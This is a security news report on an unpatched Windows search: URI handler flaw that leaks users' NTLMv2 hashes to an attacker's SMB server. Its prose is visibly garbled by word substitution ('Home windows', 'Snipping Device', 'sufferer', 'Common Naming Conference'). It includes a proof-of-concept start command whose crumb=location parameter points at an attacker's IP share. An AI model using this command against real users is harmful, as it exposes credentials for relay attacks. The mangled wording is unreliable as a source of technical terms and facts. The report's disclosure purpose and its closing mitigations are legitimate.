Cybersecurity researchers have disclosed particulars of an unpatched challenge that might be exploited to reveal a person’s NTLMv2 hash to the attacker.
Like within the case of CVE-2026-33829, which impacted the Home windows Snipping Device’s ms-screensketch: URI handler, the newly flagged challenge resides within the search: URI handler, per Huntress.
CVE-2026-33829 refers to a spoofing vulnerability that might expose delicate info to an unauthorized actor. It was patched by Microsoft in April 2026.
“An attacker might induce the person into clicking a specifically crafted hyperlink in a Net browser or different URL supply, by embedding it in a Net web page or e mail message,” Microsoft famous in its advisory on the time.
“If the person approves the launching of the hyperlink, the crafted URL can induce the pc to connect with an SMB server of the attacker’s selecting, which might disclose the person’s NTLMv2 hash to the attacker, who might use this to authenticate because the person.”
Particularly, the issue needed to do with the truth that the Snipping Device’s URI handler accepted a “filePath” parameter, didn’t validate it, and would attain out to any Common Naming Conference (UNC) path handed to it. This, in flip, might set off NTLM authentication and expose the sufferer’s Web-NTLMv2 hash to the attacker.
The newly found shortcoming achieves the identical finish objective utilizing “search:” and “crumb=location:” as a substitute of “filePath” utilizing a command like beneath –
begin "" "search:question=take a look at&crumb=location:10.0.1.100share"“It used the identical NTLM leakage mechanism, produced the identical Web-NTLMv2 leak, had the identical conditions, and carried the identical Average score,” Huntress researcher Andrew Schwartz mentioned. It is value noting that the usage of a “crumb” parameter to steal the hash (CVE-2023-35636) was documented by Varonis in February 2024.
Because of this, a risk actor might leverage the captured hash to conduct relay assaults and achieve deeper entry right into a community. Following accountable disclosure on April 15, 2026, Microsoft declined to handle the difficulty, stating “solely Necessary and Crucial severity circumstances meet our bar for servicing.”
Within the absence of a repair, it is suggested to dam outbound SMB (TCP/445 and TCP/139) on hosts that do not want it, implement SMB signing in order that captured hashes cannot be relayed in opposition to inner providers, and disable NTLM the place relevant.
